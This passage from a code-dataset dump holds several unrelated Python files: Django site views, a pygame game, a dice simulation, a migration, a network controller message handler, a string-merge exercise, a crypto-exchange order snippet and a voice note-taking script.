Advantages.DoesNotExist:\n advantages = False\n args['advantages'] = advantages\n try:\n reviews_title = ReviewsTitle.objects.get()\n except ReviewsTitle.MultipleObjectsReturned:\n reviews_title = ReviewsTitle.objects.all().last()\n args['reviews_title'] = reviews_title\n args['reviews'] = Reviews.objects.all()\n try:\n certificate_title = CertificateTitle.objects.get()\n except CertificateTitle.MultipleObjectsReturned:\n certificate_title = CertificateTitle.objects.all().last()\n args['certificate_title'] = certificate_title\n args['links'] = Links.objects.all()\n args['certificates'] = Certificate.objects.all()\n try:\n footer_title = FooterTitle.objects.get()\n except FooterTitle.MultipleObjectsReturned:\n footer_title = 
FooterTitle.objects.all().last()\n args['footer_title'] = footer_title\n try:\n footer_info = FooterInfo.objects.get()\n except FooterInfo.MultipleObjectsReturned:\n footer_info = FooterInfo.objects.all().last()\n args['footer_info'] = footer_info\n args['footer_text'] = FooterText.objects.all()\n try:\n googlemap = Googlemap.objects.get()\n except Googlemap.MultipleObjectsReturned:\n googlemap = Googlemap.objects.all().last()\n args['googlemap'] = googlemap\n return render_to_response('index.html', args)\n\n\ndef contact(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n phone = request.POST.get('phone')\n email = request.POST.get('email')\n user = Callback(name=name, phone=phone, email=email)\n user.save()\n name = name.encode('utf-8')\n user_id = str(user.id)\n name = 'Моё имя: ' + str(name) + '\\n'\n phone = 'Мой номер: ' + str(phone) + '\\n'\n email = 'Мой email: ' + str(email) + '\\n'\n send_mail('From Ankalife ', name + phone + email + 'Number: ' + user_id, 'donnietruth@gmail.com', ['donnietruth@gmail.com'])\n return HttpResponse(\"Ваша заявка принята!\")\n\n\ndef send_question(request):\n if request.method == 'POST':\n name = request.POST.get('nameQ')\n email = request.POST.get('emailQ')\n question = request.POST.get('question')\n abc = Question(name=name, email=email, question=question)\n abc.save()\n name = name.encode('utf-8')\n question = question.encode('utf-8')\n abc_id = str(abc.id)\n name = 'Моё имя: ' + str(name) + '\\n'\n email = 'Мой email: ' + str(email) + '\\n'\n question = 'Вопрос: ' + str(question) + '\\n'\n send_mail('From Ankalife', name + email + question + 'Number: ' + abc_id, 'donnietruth@gmail.com', ['donnietruth@gmail.com'])\n return HttpResponse('Ваш вопрос принят.')\n\n\ndef call(request):\n if request.method == 'POST':\n name = request.POST.get('name1')\n phone = request.POST.get('phone1')\n email = request.POST.get('email1')\n user = Callback(name=name, phone=phone, email=email)\n user.save()\n name = name.encode('utf-8')\n user_id = str(user.id)\n name = 'Моё имя: ' + str(name) + '\\n'\n phone = 'Мой номер: ' + str(phone) + '\\n'\n email = 'Мой email: ' + str(email) + '\\n'\n send_mail('From Ankalife ', name + phone + email + 'Number: ' + user_id, 'donnietruth@gmail.com', ['donnietruth@gmail.com'])\n return HttpResponse(\"Ваша заявка принята!\")\n\n\n\n\ndef contacts(request, args={}):\n args.update(csrf(request))\n try:\n head_title = Head_title.objects.get()\n except Head_title.MultipleObjectsReturned:\n head_title = Head_title.objects.all().last()\n args['head_title'] = head_title\n try:\n head = Head.objects.get()\n except Head.MultipleObjectsReturned:\n head = Head.objects.all().last()\n args['head'] = head\n args['headlink'] = HeadLink.objects.all()\n args['head_phone'] = HeadPhone.objects.all()\n args['inter'] = Inter.objects.all()\n args['menu'] = Menu.objects.all()\n args['links'] = Links.objects.all()\n try:\n footer_title = FooterTitle.objects.get()\n except FooterTitle.MultipleObjectsReturned:\n footer_title = FooterTitle.objects.all().last()\n args['footer_title'] = footer_title\n try:\n footer_info = FooterInfo.objects.get()\n except FooterInfo.MultipleObjectsReturned:\n footer_info = FooterInfo.objects.all().last()\n args['footer_info'] = footer_info\n args['footer_text'] = FooterText.objects.all()\n try:\n googlemap = Googlemap.objects.get()\n except Googlemap.MultipleObjectsReturned:\n googlemap = Googlemap.objects.all().last()\n args['googlemap'] = googlemap\n return render_to_response('contacts.html', 
args)","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"123042694","text":"#\n# PYGAME TESTING DEMO - Tea Party Game Testing\n# Author: Wei Zeng\n# Date: Aug.24 2021\n#\n\nfrom main_menu import MainMenu, uiButton\nfrom delivery_zone import *\nfrom collision_container import *\nfrom barrier import *\nfrom barrier_parser import load_txt\nfrom tea_bubble import *\nfrom tea_drop import *\nimport os\nimport pygame\nimport logging\n\n# from pygame.display import toggle_fullscreen\n# from pygame.scrap import contains\n\n# Init Root Directory\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n# Init Font Options\npygame.font.init()\nmyfont = pygame.font.SysFont('Showcard Gothic', 30)\n\n# Macros\nGAME_ON = False\nDAMAGE_RECEIVING_CD = 3000 # milliseconds\nFPS = 60\nWHITE = (255, 255, 255)\nWIDTH, HEIGHT = 1600, 900\nHEALTH_UNIT_WIDTH = 40\nHEALTH_UNIT_HEIGHT = 40\nBACKGROUND_WIDTH = 4000\nBACKGROUND_SPEED = 2\nCONTAINER_WIDTH, CONTAINER_HEIGHT = 180, 180\n\nTEA_CUP_IMAGE = pygame.transform.scale(pygame.image.load(ROOT_DIR + r'/image/teacup.png'),\n (CONTAINER_WIDTH, CONTAINER_HEIGHT))\nTEA_POT_IMAGE = pygame.transform.scale(pygame.image.load(ROOT_DIR + r'/image/teapot.png'),\n (CONTAINER_WIDTH, CONTAINER_HEIGHT))\n\n\nclass Health:\n def __init__(self, image_path):\n self.image = pygame.transform.scale(pygame.image.load(image_path),\n (HEALTH_UNIT_WIDTH, HEALTH_UNIT_HEIGHT)).convert_alpha()\n self.life_count = 3\n self.health_bar_pos_x = 70\n self.health_bar_pos_y = 70\n\n\ndef draw(window, map, obj_list, tea_drops, health, collected_tea, tea_bubbles, main_menu):\n \"\"\"\n draw(window, obj_list, tea_drops):\n :param tea_bubbles:\n :param health:\n :param collected_tea:\n :param map:\n :param tea_drops: Qualified tea drops list to be drawn\n :param obj_list: Container list basically, containers to be drawn\n :param window: The main game window object\n :return: Void, draw all passed in objects\n \"\"\"\n\n global GAME_ON\n # Setup White Background\n window.fill(WHITE)\n\n # Draw Background\n window.blit(map.image, (map.starting_dx, 0))\n\n # Draw barriers\n for barrier in map.barriers:\n window.blit(barrier.image,\n (barrier.get_global_position(map.starting_dx), 0))\n # Draw delivery zones\n for zone in map.delivery_zones:\n window.blit(zone.image,\n (zone.get_global_position(map.starting_dx), 0))\n\n window.blit(zone.image,\n (zone.get_mirror_global_position(map.starting_dx), 0))\n\n deliver_here_image = pygame.image.load(ROOT_DIR + r'/image/deliver_here.png')\n # Draw delivery zones\n for zone in map.delivery_zones:\n window.blit(zone.image,\n (zone.get_global_position(map.starting_dx), 0))\n\n window.blit(zone.image,\n (zone.get_mirror_global_position(map.starting_dx), 0))\n\n window.blit(deliver_here_image,\n (zone.get_global_position(map.starting_dx), 0))\n\n window.blit(deliver_here_image,\n (zone.get_mirror_global_position(map.starting_dx), 0))\n\n text_surface = myfont.render(\n str(zone.tea_level) + ' / ' + str(zone.tea_requirement), False, (0, 0, 0))\n window.blit(text_surface, (zone.get_global_position(map.starting_dx) - 100, 35))\n window.blit(text_surface, (zone.get_mirror_global_position(map.starting_dx) - 100, 35))\n\n if GAME_ON:\n obj_index = 0\n for i in obj_list:\n window.blit(i.image, (i.position_rect.x, i.position_rect.y))\n if obj_index == 0:\n tea_pot_surface = myfont.render(str(i.tea_level), False, (0, 0, 0))\n 
window.blit(tea_pot_surface, (i.position_rect.x + 55, i.position_rect.y + 55))\n obj_index += 1\n\n # Display End Game Content or Main Menu\n if map.are_delivery_zones_full():\n window.blit(pygame.image.load(\n ROOT_DIR + r'/image/you_win.png'), (WIDTH / 3, HEIGHT / 3))\n elif health.life_count <= 0:\n window.blit(pygame.image.load(\n ROOT_DIR + r'/image/game_over.png'), (WIDTH / 4, HEIGHT / 6))\n elif not GAME_ON:\n main_menu.show_main_menu(window)\n\n # Draw tea drops\n for d in tea_drops:\n window.blit(d.image, (d.position_rect.x, d.position_rect.y))\n\n # Draw Healthbar\n if GAME_ON:\n i = 0\n while i < health.life_count:\n window.blit(health.image, (health.health_bar_pos_x +\n i * 60, health.health_bar_pos_y))\n i += 1\n\n # Draw Tea Bubbles\n draw_all_tea_bubble(window, tea_bubbles)\n\n # Init Collected Tea Display Text and Draw\n textsurface = myfont.render(\n 'Tea Drops: ' + str(collected_tea), False, (0, 0, 0))\n window.blit(textsurface, (1200, 70))\n window.blit(pygame.image.load(\n ROOT_DIR + r'/image/teadrop.png'), (1410, 70))\n\n pygame.display.update()\n\n\ndef is_game_on(life_count, map):\n \"\"\"\n is_game_on(life_count, map):\n :param life_count:\n :param map:\n :return:\n \"\"\"\n global GAME_ON\n if life_count > 0 and not map.are_delivery_zones_full() and GAME_ON:\n return True\n else:\n return False\n\n\ndef main():\n \"\"\"\n main(): This is the game main execution function, including the main execution loop and\n game logic.\n :return: Void\n \"\"\"\n\n # Initialize the game window\n window = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Tea-Mates\")\n\n # Fetch Barrier and Delivery Zone data\n data = load_txt(os.path.join(ROOT_DIR, 'barrier_data.txt'))\n barriers_data = data[0]\n delivery_zone_data = data[1]\n\n barriers = []\n delivery_zones = []\n\n for bNode in barriers_data:\n barriers.append(Barrier(bNode))\n\n for bNode in delivery_zone_data:\n delivery_zones.append(DeliveryZone(bNode))\n\n # Start game clock\n clock = pygame.time.Clock()\n start_time = pygame.time.get_ticks()\n last_tea_drop_time = start_time\n damage_timer = None\n run = True\n\n # Initialize Health Bar\n health = Health(ROOT_DIR + r'/image/teacup.png')\n\n # Initialize game objects\n game_map = Map(ROOT_DIR + r'/image/Background.png',\n barriers, delivery_zones)\n cup = Container(0, 600, ROOT_DIR + r'/image/teacup.png', 0, 101, 87)\n pot = Container(0, 100, ROOT_DIR + r'/image/teapot.png', 20, 143, 106)\n\n collected_tea = 0\n tea_bub_image_path = os.path.join(ROOT_DIR, 'image/tea_bubble')\n\n qualified_drops = []\n last_bubble_gen_time = [start_time]\n all_bubble_list = []\n \n # Create Main Menu Components\n game_over_timer = 0\n def start_game(game_map: Map , healt_count):\n global GAME_ON\n\n if healt_count == 3:\n if not GAME_ON:\n GAME_ON = True\n game_map.starting_dx = 0\n\n main_menu = MainMenu([]) \n start_button = uiButton(start_game, 'Start', main_menu.pos_x + WIDTH / 5.5, 400)\n main_menu.buttons.append(start_button)\n\n # Main Execution Loop\n while run:\n global GAME_ON\n clock.tick(FPS)\n now = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.MOUSEBUTTONUP:\n mouse_click_pos = pygame.mouse.get_pos()\n print(mouse_click_pos)\n if start_button.collision_rect.collidepoint(mouse_click_pos):\n start_game(game_map, health.life_count)\n\n now = pygame.time.get_ticks()\n\n if is_game_on(health.life_count, game_map):\n pot.tea_drop_position_update()\n # Randomly Generate Tea 
Bubbles Every 5 Seconds\n new_bubble = gen_rand_tea_bubble_per_n_second(5, last_bubble_gen_time, tea_bub_image_path)\n if new_bubble is not None:\n all_bubble_list.append(new_bubble)\n\n for zone in delivery_zones:\n zone.detect_collision(cup, game_map)\n zone.detect_mirror_collision(cup, game_map)\n\n # Drop a unit of tea every 0.4 seconds\n if now - last_tea_drop_time > 400 and pot.tea_level > 0:\n qualified_drops.append(\n TeaDrop(pot.tea_drop_position[0], pot.tea_drop_position[1], ROOT_DIR + r'/image/teadrop.png'))\n pot.tea_level -= 1\n last_tea_drop_time = now\n\n collected_tea = cup.tea_level\n\n # Check Collision To Determine Whether to Draw\n qualified_drops = drop_tea(qualified_drops, cup)\n all_bubble_list = get_qualified_tea_bubble(all_bubble_list, pot)\n\n keys_pressed = pygame.key.get_pressed()\n pot_control_listener(keys_pressed, pot)\n cup_control_listener(keys_pressed, cup)\n\n # for bub in all_bubble_list:\n # if tea_bubble_collision_detector(pot, bub):\n # refill_tea(pot, bub)\n\n # Using the new can_receive_damage bosol of containers to give some breathing room after taking a damage\n # DAMAGE_RECEIVING_CD is set to 3000 milliseconds (3 seconds) Damage timer starts immediately after a\n # collision happens and counts to 3 and then can_receive_damage is set back to True\n if cup.can_receive_damage and pot.can_receive_damage:\n draw(window, game_map, [pot, cup], qualified_drops, health, collected_tea, all_bubble_list, main_menu)\n if collision_detector(pot, cup):\n damage_timer = now\n health.life_count = 0\n game_over_timer = now\n GAME_ON = False\n for barrier in barriers:\n if barrier.detect_collision(pot, game_map) or barrier.detect_collision(cup, game_map):\n damage_timer = now\n health.life_count -= 1\n if not health.life_count > 0:\n game_over_timer = now\n GAME_ON = False\n else:\n time_passed = now - damage_timer\n if time_passed < 500 or (1000 < time_passed < 1500) or (2000 < time_passed < 2500):\n draw(window, game_map, [], qualified_drops,\n health, collected_tea, all_bubble_list, main_menu)\n else:\n draw(window, game_map, [\n pot, cup], qualified_drops, health, collected_tea, all_bubble_list, main_menu)\n # Reset the damage timer 3 seconds after getting damaged\n if now - damage_timer > DAMAGE_RECEIVING_CD:\n pot.can_receive_damage = True\n cup.can_receive_damage = True\n damage_timer = None\n # Update TeaDrop Position\n if game_map.are_delivery_zones_full():\n game_over_timer = now\n GAME_ON = False\n else:\n draw(window, game_map, [], [], health,\n collected_tea, all_bubble_list, main_menu)\n game_map.slideMap()\n if ((not GAME_ON and health.life_count <= 0) or game_map.are_delivery_zones_full()) and now - game_over_timer > 4000:\n main()\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"201242079","text":"\"\"\"\nYou roll N fair six­sided dice.\nThe sum of the values is M.\nWe wish to know about the product of the faces.\n\nQuestions:\nIf N = 8 and M = 24, what is the expected value and standard deviation\n of the product?\n\nIf N = 50 and M = 150, what is the expected value and standard deviation\n of the product?\n\"\"\"\n\nimport numpy as np\n\n\ndef productOfAllFacesMonteCarlo(n, m, s):\n # @input:\n # int n, nummbers of rolling dice\n # int m, sum of values\n # int s, sample size\n # @output:\n # mean, 
expected value of the product\n # std, standard deviation of the product\n product = []\n for i in range(s):\n dice = np.random.randint(1, 7, size=(1, n))\n if dice.sum() == m:\n product.append(float(np.prod(dice)))\n return (float(np.mean(product)), np.std(product))\n\n\nif __name__ == '__main__':\n print(productOfAllFacesMonteCarlo(2, 6, 1000))\n","sub_path":"roll_fair_dice.py","file_name":"roll_fair_dice.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"589884025","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('funcionarios', '0003_ponto'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='ponto',\n name='funcionario',\n field=models.ForeignKey(to='funcionarios.Funcionario', related_name='dia_trabalho'),\n ),\n ]\n","sub_path":"funcionarios/migrations/0004_auto_20160217_1944.py","file_name":"0004_auto_20160217_1944.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"254757336","text":"import threading\nimport os, sys\nimport time\nimport logging\nimport subprocess\nimport struct, socket\nimport flow_common\nimport run_env\nfrom pyDatalog import pyDatalog\nfrom commit_ovs import commit_flows\nfrom onexit import on_parent_exit\nfrom tp_utils import pipe\nfrom run_env import get_extra\nfrom tuplesync import update_ovs_side\nfrom logicalview import LOGICAL_ENTITY_TYPE_LSP, LOGICAL_ENTITY_TYPE_CHASSIS\n\nMAX_BUF_LEN = 10240\n\nextra = run_env.get_extra()\nlogger = logging.getLogger(__name__)\nentity_zoo = None\n\ndef int_to_ip(ip_int):\n return socket.inet_ntoa(struct.pack('I',socket.htonl(ip_int)))\n\ndef update_ovs_arp_ip_mac(mac_addr, ip_int):\n match = 'table={t},priority=1,ip,reg2={dst},'.format(\n t = flow_common.TABLE_SEARCH_IP_MAC, dst = ip_int)\n action = 'actions=mod_dl_dst:{}'.format(mac_addr)\n flow = match + action\n commit_flows([flow], [])\n\ndef process_arp(arp_msg_seg):\n #TODO verify mac_addr, ip\n datapath = int(arp_msg_seg[1])\n mac_addr = arp_msg_seg[2]\n ip_int = int(arp_msg_seg[3])\n ip = int_to_ip(ip_int)\n logger.info(\"update arp mac_ip bind map[%s,%d(%s),%d]\",\n mac_addr, ip_int, ip, datapath)\n update_ovs_arp_ip_mac(mac_addr, ip_int)\n\ndef process_trace(trace_msg_seg):\n table_id = trace_msg_seg[1]\n datapath_id = trace_msg_seg[2]\n cmd_id = int(trace_msg_seg[3]) >> 16\n src_port_id = trace_msg_seg[4]\n dst_port_id = trace_msg_seg[5]\n tun_src = int(trace_msg_seg[6])\n seq_n = trace_msg_seg[7]\n logger.info('tracing packets, table_id:%s, datapath_id:%s, '\n 'cmd_id:%d, src_port_id:%s, dst_port_id:%s, seq:%s, tun_src:%d',\n table_id, datapath_id, cmd_id,\n src_port_id, dst_port_id, seq_n, tun_src)\n ttl = 30\n chassis_id = get_extra()['system_id']\n key = \"cmd_result/{}/{}/{}\".format(cmd_id, seq_n, chassis_id)\n value = \"cmd_type=pkt_trace,table_id={},datapath_id={},src_port_id={},dst_port_id={},tun_src={}\".format(\n table_id, datapath_id, src_port_id, dst_port_id, tun_src)\n wmaster = extra['lm']\n wmaster.lease_communicate(key, value, ttl)\n\ndef process_unknow_dst(unknow_dst_msg_seg):\n datapath_id = int(unknow_dst_msg_seg[1])\n ip_int = int(unknow_dst_msg_seg[2])\n ip = int_to_ip(ip_int)\n logger.info(\"receive unknow packet: datapath:%d,dst_ip:%s\", datapath_id, ip)\n table_id = int(unknow_dst_msg_seg[1])\n\n # 
find all lsp by using ip\n # TODO figure out all or just one?\n def fn_lsp(lsp_portset, ip_int):\n array = []\n for _, lsp in lsp_portset.items():\n if lsp.ip_int == ip_int:\n array.append(lsp)\n return array\n\n def fn_chassis(chassis_set, chassis_uuid):\n array = []\n for _, chassis in chassis_set.items():\n if chassis.uuid == chassis_uuid:\n array.append(chassis)\n return array\n\n lsp_array = entity_zoo.touch_entity(LOGICAL_ENTITY_TYPE_LSP, fn_lsp, ip_int)\n if len(lsp_array) == 0:\n return\n\n cnt = 0\n for lsp in lsp_array:\n if lsp.chassis is None:\n continue\n chassis_array = entity_zoo.touch_entity(LOGICAL_ENTITY_TYPE_CHASSIS,\n fn_chassis, lsp.chassis)\n cnt += len(chassis_array)\n\n if cnt != 0:\n update_ovs_side(entity_zoo)\n\n\ndef parse_pkt_controller_msg(msg):\n msg_array = msg.split(';')\n for cmd in msg_array:\n if cmd == '':\n continue\n try:\n segment = cmd.split(',')\n opcode = segment[0]\n if opcode == 'arp':\n process_arp(segment)\n elif opcode == 'trace':\n process_trace(segment)\n elif opcode == 'unknow_dst':\n process_unknow_dst(segment)\n else:\n logger.warning('unknow msg from pkt_controller,msg:%s', msg)\n except Exception as err:\n logger.exception('error in parsing pkt_controller msg, err:%s', err)\n continue\n\ndef run_pkt_controller_instance():\n env = os.environ.copy()\n if extra.has_key('log_dir'):\n env['TUPLENET_LOGDIR'] = extra['log_dir']\n parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n cmd = ['{}/pkt_controller/pkt_controller'.format(parent_dir)]\n try:\n child = subprocess.Popen(cmd, stdout=subprocess.PIPE, env = env,\n preexec_fn=on_parent_exit('SIGTERM'))\n logger.info(\"the pkt_controller is running now\")\n except Exception as err:\n logger.warning(\"cannot open %s, err:%s\", cmd, err)\n\n\ndef monitor_pkt_controller_tunnel(ez, extra):\n # make global entity_zoo can be accessed\n global entity_zoo\n entity_zoo = ez\n try:\n pyDatalog.Logic(extra['logic'])\n run_pkt_controller_instance()\n fd = pipe.create_pkt_controller_tunnel()\n while True:\n msg = os.read(fd, MAX_BUF_LEN)\n if msg == '':\n logger.info('receive no msg, maybe pkt_controller is down')\n return\n parse_pkt_controller_msg(msg)\n except Exception as err:\n logger.warning(\"hit unknow error, exit monitoring pkt_controller:%s\", err)\n\n\ndef start_monitor_pkt_controller_tunnel(entity_zoo, extra):\n t = threading.Thread(target = monitor_pkt_controller_tunnel,\n args=(entity_zoo, extra))\n t.setDaemon(True)\n t.start()\n return t\n\n","sub_path":"src/tuplenet/lcp/state_update.py","file_name":"state_update.py","file_ext":"py","file_size_in_byte":5464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"514949884","text":"'''\nAt a job interview, you are challenged to write an algorithm to check if a given string, s, can be formed from two other strings, part1 and part2.\n\nThe restriction is that the characters in part1 and part2 should be in the same order as in s.\n\nThe interviewer gives you the following example and tells you to figure out the rest from the given test cases.\n'''\n\ndata = 'codewars', 'code', 'wars'\nwrong_data = 'codewars', 'cod', 'wars'\ndata1 = \"Can we merge it? Yes, we can!\", \"an wmreY a!\", \"Ce eg it? 
es, wecn\"\n\n\ndef is_merge(s, part1, part2):\n if len(s) != len(part1) + len(part2):\n return False\n count = 0\n temp = ''\n for i in s:\n try:\n if (part1 and part2) and (part1[len(temp)] == i and part2[len(temp)] == i):\n temp += i\n elif i in part1 or i in part2:\n if part1 and i == part1[len(temp)]:\n if temp:\n part1 = part1[len(temp):]\n temp = ''\n part1 = part1.replace(i, '', 1)\n count += 1\n elif part2 and i == part2[len(temp)]:\n if temp:\n part2 = part2[len(temp):]\n temp = ''\n part2 = part2.replace(i, '', 1)\n count += 1\n except Exception:\n return False\n\n print(part1, part2)\n return not any((part1, part2))\n\nprint(is_merge('codewars', 'code', 'code'))\n","sub_path":"merged_string.py","file_name":"merged_string.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"236571919","text":"import pybithumb\n\ncon_key = \"81dd5f25e5daa70b2fff603901d2c09c\"\nsec_key = \"82333efegeg9eg3e77c573weg34af17a\"\n\nbithumb = pybithumb.Bithumb(con_key, sec_key)\n\nunit = bithumb.get_balance(\"BTC\")[0]\nprint(unit)\norder = bithumb.sell_limit_order(\"BTC\", 4000000, unit)\nprint(order)\n","sub_path":"ch06/06_09.py","file_name":"06_09.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"640559578","text":"#!/usr/bin/python3\n# NOTE: May require the system Python 3 rather than using 3.9\nimport os.path\nimport sys\nimport json\nimport socket\nimport functools\nimport threading\nimport traceback\nimport subprocess\nimport time\nimport requests\nimport speech_recognition as sr\n\nTRIGGER_SOCKET = \"/tmp/stenographer\"\nNOTES_DIR = os.path.expanduser(os.environ.get(\"NOTES_DIR\", \"~/tmp/notes\"))\nos.makedirs(NOTES_DIR, exist_ok=True)\n\n# Get rid of the ALSA warnings by preloading it with stderr muted\ndef silence_pyaudio():\n\tdevnull = os.open(os.devnull, os.O_WRONLY)\n\told_stderr = os.dup(2)\n\tsys.stderr.flush()\n\tos.dup2(devnull, 2)\n\tos.close(devnull)\n\ttry:\n\t\timport pyaudio; pyaudio.PyAudio()\n\tfinally:\n\t\tos.dup2(old_stderr, 2)\n\t\tos.close(old_stderr)\n\ndef log_errors(f):\n\t@functools.wraps(f)\n\tdef inner(*a, **kw):\n\t\ttry:\n\t\t\tf(*a, **kw)\n\t\texcept:\n\t\t\twith open(NOTES_DIR + \"/notes.err\", \"a\") as err:\n\t\t\t\ttraceback.print_exc(file=err)\n\t\t\traise\n\treturn inner\n\ndef safe_int(n):\n\t\"\"\"Sort key for probably-numeric strings\n\n\tSorts unparseable strings first in lexicographical order, then\n\teverything that intifies in numerical order.\n\t\"\"\"\n\ttry: return (1, int(n))\n\texcept (ValueError, TypeError): return (0, n)\n\nrecog = None\n@log_errors\ndef take_notes(*, desc, new_match=False, **extra):\n\tblocks = sorted(os.listdir(NOTES_DIR), key=safe_int)\n\n\ttry: int(blocks[-1])\n\texcept (IndexError, ValueError): new_match = 2\n\tif new_match:\n\t\tnext = int(blocks[-1] if new_match != 2 else 0) + 1\n\t\tblocks.append(str(next))\n\t\tos.mkdir(NOTES_DIR + \"/\" + blocks[-1])\n\tblock = NOTES_DIR + \"/\" + blocks[-1] # Use the latest block (which we may have just created)\n\n\tglobal recog\n\tif recog is None:\n\t\tsilence_pyaudio()\n\t\trecog = sr.Recognizer()\n\t\trecog.dynamic_energy_threshold = False\n\t\trecog.energy_threshold = 50 # My microphone is very good. It doesn't pick up much background.\n\t\tif os.stat(NOTES_DIR + \"/listening.wav\"):\n\t\t\t# Provide a notification tone. 
This one works well and is licensed CC0:\n\t\t\t# https://freesound.org/people/YourFriendJesse/sounds/235911/\n\t\t\tsubprocess.run([\"paplay\", NOTES_DIR + \"/listening.wav\", \"--volume=24576\"])\n\n\t# Can I increase the gain at all?\n\twith sr.Microphone() as source:\n\t\tprint(\"Listening for notes...\")\n\t\taudio = recog.listen(source, phrase_time_limit=15.0)\n\n\t# Discard crazily-long entries. They seem to happen if the recognizer doesn't\n\t# get a proper silence to start with or something, and it just records forever.\n\t# (Shouldn't happen since the time limit is 15s, but it's an easy safety net.)\n\tif len(audio.frame_data) / audio.sample_width / audio.sample_rate > 60.0:\n\t\t# More than sixty seconds? Throw it away.\n\t\tsys.exit(0)\n\n\tprint(\"Got notes.\")\n\tlog = open(NOTES_DIR + \"/notes.log\", \"a\")\n\ttry: os.stat(block + \"/metadata.json\")\n\texcept FileNotFoundError:\n\t\t# If the metadata file doesn't exist, it's a new block. Note that this\n\t\t# won't always correspond to the new_block marker, eg if the recording\n\t\t# goes too long or is just broken.\n\t\tprint(\"-\" * 65, file=log)\n\t\tprint(\"http://localhost:27013/static/notes.html#\" + blocks[-1], file=log)\n\t\timport webbrowser; webbrowser.open(\"http://localhost:27013/static/notes.html#\" + blocks[-1])\n\n\tprint(\"[%s]\" % block, desc, file=log, flush=True)\n\n\td = None\n\ttry: d = recog.recognize_sphinx(audio, show_all=True)\n\texcept sr.UnknownValueError: pass\n\texcept sr.RequestError as e: print(\"Sphinx:\", e, file=log, flush=True)\n\n\toptions = [b.hypstr for b in d.nbest()] if d else []\n\tseen = {}\n\tfor txt in options[:5]:\n\t\tprint(\"Sphinx: %s\" % txt, file=log, flush=True)\n\t\tseen[txt] = 1\n\n\t# Maybe TODO: Set an API key with key=\"....\"\n\ttry: google = recog.recognize_google(audio)\n\texcept sr.UnknownValueError: google = \"\"\n\texcept sr.RequestError as e: google = repr(e)\n\n\tprint(\"Google:\", google, file=log, flush=True)\n\n\t# Below duplicated into gamestate_integration.py\n\ttry:\n\t\twith open(block + \"/metadata.json\") as f: meta = json.load(f)\n\texcept (FileNotFoundError, json.decoder.JSONDecodeError): meta = {}\n\tif \"recordings\" not in meta: meta[\"recordings\"] = []\n\tnote_id = meta[\"recordings\"][-1][\"id\"] + 1 if meta[\"recordings\"] else 1\n\tfn = f\"/{note_id:02d} - {desc.replace('/', '_')}.flac\"\n\twith open(block + fn, \"wb\") as f: f.write(audio.get_flac_data())\n\tmeta[\"recordings\"].append({\n\t\t\"id\": note_id,\n\t\t\"desc\": desc,\n\t\t\"filename\": fn,\n\t\t\"sphinx\": options[:5],\n\t\t\"google\": google,\n\t})\n\tfor key in \"round\", \"spec\", \"score\", \"time\", \"bombtime\", \"player_state\":\n\t\tif key in extra: meta[\"recordings\"][-1][key] = extra[key]\n\twith open(block + \"/metadata.json\", \"w\") as f:\n\t\tjson.dump(meta, f, sort_keys=True, indent=2)\n\n\tif \"--gsi\" in sys.argv:\n\t\t# Signal the GSI server to load new metadata, if appropriate\n\t\trequests.post(\"http://localhost:27013/metadata/\" + blocks[-1], json=meta)\n\ndef watchdog(status):\n\t\"\"\"Wait until it's been 5-10 mins since the last action, and GSI says we're inactive\"\"\"\n\twhile True:\n\t\ttime.sleep(300)\n\t\tgsi_data = requests.get(\"http://localhost:27013/status.json?silent=true\").json()\n\t\tprint(\"Watchdog check:\", gsi_data[\"playing\"])\n\t\tif gsi_data[\"playing\"]: continue\n\t\tif not status[0]: break\n\t\tstatus[0] = False\n\tprint(\"Watchdog close\")\n\tsocket.socket(socket.AF_UNIX, socket.SOCK_DGRAM).sendto(b\"!\", TRIGGER_SOCKET)\n\nif 
\"--gsi\" in sys.argv:\n\t# Try to connect to the trigger socket. If it fails, start the server.\n\t# Note that this can get into a race situation. I don't know how to\n\t# perfectly solve this, so we just retry a few times.\n\tfor _ in range(4):\n\t\tclient = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n\t\ttry: client.sendto(b\"*\", TRIGGER_SOCKET)\n\t\texcept FileNotFoundError: pass # Socket doesn't exist\n\t\texcept ConnectionRefusedError: os.unlink(TRIGGER_SOCKET) # Socket exists in the file system but isn't listened on\n\t\telse: print(\"Triggered server\"); break # Done! The server's been triggered.\n\n\t\tserver = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n\t\ttry:\n\t\t\tserver.bind(TRIGGER_SOCKET)\n\t\t\tprint(\"Listening\")\n\t\t\tstatus = [True]\n\t\t\tthreading.Thread(target=watchdog, args=(status,), daemon=True).start()\n\t\t\twhile True:\n\t\t\t\t# Do one note-taking now, and then wait for the socket\n\t\t\t\tgsi_data = requests.get(\"http://localhost:27013/status.json\").json()\n\t\t\t\tif gsi_data[\"playing\"]:\n\t\t\t\t\t# In case of issues, spawn separate threads to take the notes\n\t\t\t\t\tthreading.Thread(target=take_notes, kwargs=gsi_data).start()\n\t\t\t\t# Wait for the next trigger (or the watchdog shutdown 